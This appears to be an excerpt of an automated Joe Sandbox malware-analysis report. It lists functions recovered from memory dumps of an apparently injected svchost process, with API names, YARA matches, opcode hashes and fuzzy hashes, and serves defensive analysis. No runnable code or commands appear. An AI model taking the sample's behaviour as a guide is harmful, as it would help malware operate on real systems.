                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7bf165f9ed17759d17bfb0e0fde4c95c40bb685020ce996eae26ec36afb59c01
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49C04C10E2984A5AEA55A2AA4D8175AA1A4BB6E3A4F854031E80AC2194E54CE5D487E2
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABE150 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF426ABC0F7), ref: 00007DF426ABE160
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                                                                                                                                                                          • Instruction ID: 80438c9eff111b9e8fa21758f464b8a78674e1d9784ad68a949304791879365d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC08C20E5890B8FE90877AA6C8030621A8BB6E3A0F980021940AC2180E80CE4C043E2
                                                                                                                                                                                                                                                                                                          Function 000001C276406174 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                                                                                                                                                          • String ID: CeP$,$,
                                                                                                                                                                                                                                                                                                          • API String ID: 3061335427-2996039724
                                                                                                                                                                                                                                                                                                          • Opcode ID: e353c29c0b88583718f6329c71bf4d43162d928d93945ef273b572fc5238f9b0
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6169363a6330809aaa816c7c46cf954cb7a8d89e389c6b866fa710879b9304b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e353c29c0b88583718f6329c71bf4d43162d928d93945ef273b572fc5238f9b0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32A18730658B189BEB78EF28D4E5BE973D1FB98310F10455DE44BC3292DE74E8528B85
                                                                                                                                                                                                                                                                                                          Function 00007DF426AAA0AC Relevance: 4.9, APIs: 3, Instructions: 397COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateFile$AcceptConnectMappingPortcallocfree
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4186280995-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4a9994714ac5d85e04743317fcad2e6d80c68f1514738ca0430bfad623492367
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED1407151CB888BD765DF28D8856ABB7E1FB95310F10463EE58FC2192EF34A505CB82
                                                                                                                                                                                                                                                                                                          Function 00007DF426A94998 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 354COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                                                                                                                                                          • String ID: x
                                                                                                                                                                                                                                                                                                          • API String ID: 3061335427-2363233923
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: be0524b287bd0317c6d8f48bd58f76c7551f889cf2370d97e6fcbc4bd6b246d2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB18E31A1CA844AE729AB5898956EBB7E1FFD5310F50057EE0CFC3187DD38E605C686
                                                                                                                                                                                                                                                                                                          Function 000001C2760704E0 Relevance: 4.8, APIs: 3, Instructions: 252fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1671053578.000001C276070000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C276070000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c276070000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual$CloseFileHandleView
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 867161474-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 891408fe0d1448a39d4c9211b5b17748033e0253f96817e96866cc630ca6b417
                                                                                                                                                                                                                                                                                                          • Instruction ID: b4fa266941f2a0daecf8cd37a37f49f084840e99d33e614f13113261d200aacc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891408fe0d1448a39d4c9211b5b17748033e0253f96817e96866cc630ca6b417
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17718BB1648B0A5FEB68DF28D899BA6B3D1FB94310F50462DE48BC3281DF70E94187C1
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABF00C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 65e82485401768b1f5e4233b42454eacbb9a4421d324295337638fcf8c79d620
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0417330608B498FE754EB58D848B6BB7E4FBA9351F14052EE94AC3290EB79D844C792
                                                                                                                                                                                                                                                                                                          Function 000001C27640771C Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 371COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NJI@
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1894075864
                                                                                                                                                                                                                                                                                                          • Opcode ID: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: c36c18d302e7fcb24499de79db36656e0ff3649c55712bb3d9c842f7c413817f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E16D7051C7D48BE3759F2988917EBBBE1FB99302F00492EE4CAC2281EB749501CB83
                                                                                                                                                                                                                                                                                                          Function 000001C2783233B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1771251519.000001C278320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C2782E0000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c2782e0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                          • String ID: x
                                                                                                                                                                                                                                                                                                          • API String ID: 3298025750-2363233923
                                                                                                                                                                                                                                                                                                          • Opcode ID: d66a01202ac467ddf61ba4bfa63189e55d6692710d42d0a16d7a77e600116e1c
                                                                                                                                                                                                                                                                                                          • Instruction ID: bc871180a1a2167b5e6ab96b9f900fe2981286a2e2db0616bf1ce96d183c07e6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d66a01202ac467ddf61ba4bfa63189e55d6692710d42d0a16d7a77e600116e1c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 519114726443E147FB30AA2DE484FEEBBA1F395B84F400012DB9657E95EABCC646C741
                                                                                                                                                                                                                                                                                                          Function 000001C276408974 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                          • String ID: !RHY
                                                                                                                                                                                                                                                                                                          • API String ID: 621844428-2095432132
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2866ae3145b7b2e8b7e50758e3c18dccd0790ead28cb59ab9252b37ae8079d46
                                                                                                                                                                                                                                                                                                          • Instruction ID: 15cb7bbe1ae2c16a9457a05895e503bc04a9e6f12cf963d1ba1cdc8976a7f85c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2866ae3145b7b2e8b7e50758e3c18dccd0790ead28cb59ab9252b37ae8079d46
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB41A7302487584FEB65EF68C495BEA77E4FB68300F54056DE88AC7296DFB4D8058B82
                                                                                                                                                                                                                                                                                                          Function 00007DF426B8E854 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                                                                                                                                          • API String ID: 0-3081909835
                                                                                                                                                                                                                                                                                                          • Opcode ID: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                                                                                                                                                                                                          • Instruction ID: a7b31595d0a53354d6fe2732021adecdb9c21e24c905e8aa749957404dd3bc29
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77718270918B188FD768DF28C8851AA77F5FB49721B50163FD89FC3692E734A4468BC1
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC128C Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateReadmalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3950102678-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae3db0ca2c5520104ac61aafc9735f8b80d3d66590d05123d946586b379aac5c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72718470A1CB844FE7589F5898C57AAB6E1FFE9311F50093FE48FC3292DA389C458642
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA9F24 Relevance: 3.2, APIs: 2, Instructions: 163fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3388366904-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8c9969b75f666050c9f513628959c0e5ab843ef07ed008fbf53c77faef3c5335
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7241A17060C6484FEB58EB28AC8567AB7F5FB99711F00453FE98BC3191EA34DD018B82
                                                                                                                                                                                                                                                                                                          Function 00007DF426AE8194 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3755109111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                                                                                                                                                                          • Instruction ID: e215f978510c2ea48a335ce47ad28bacb12a2bb810afba43087f4a03bbf897d1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA41A330618E448FEB58AB28DC9867B77E5FB5A321F50057AE45BC2291DB38D901C686
                                                                                                                                                                                                                                                                                                          Function 00007DF426AE9488 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3755109111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                                                                                                                                                                          • Instruction ID: e6f004a7ee6511c01b0f94a83a18527bef4520cde5150d4d3a3101d00a8db719
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E931A630B08B944FFF54AA289C8467A73E5FB56335F50007BD81FC21D6EA2ADC45C695
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC0E5C Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3388366904-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9905fe104925c99d7b671e800410e6a54f8e225159184a9ce02819d2d7051e40
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8921A77170C7884FE7649A5CACC667A73E4EFDA720F10013EE98FC2242DA75A8464696
                                                                                                                                                                                                                                                                                                          Function 00007DF426AAD818 Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$AcceptConnectNameName_Portcallocfree
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3949126726-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                                                                                                                                                                          • Instruction ID: b64d9ba2edd302429fc5e3fa5d47b6c7d36dafb8a56448d74034ed1d22ce95b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4201F231218E084FE748BB6CAC8A5B677E5E7A9762704817AE40AC3261DD39E8418BD1
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA9BA4 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 524692379-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7c9246edb4b4146f7b5baae393711521a99ece0811119c0994364a8c9cdcac16
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AB1307161CA888FE755EF28D8846AAB7F1FF95310F504A3EE04BC7191DA34A945CB81
                                                                                                                                                                                                                                                                                                          Function 00007DF426AE9A44 Relevance: 1.8, APIs: 1, Instructions: 269networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                                                                                                                                                                          • Instruction ID: 32ca487e2eed7d2a70af4ca8773918514e26f23928de49a9420164a5277a7b05
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E911F70A18F458FEB94EF28C8896A677E0FF55325F50017AD44BC6561EB39E840CB51
                                                                                                                                                                                                                                                                                                          Function 00007DF426A92514 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                                                                                                                                                                          • Instruction ID: fa22da358c6673ef92df011421324ea2b2b5f7264803c278d5f15b51199a0ed2
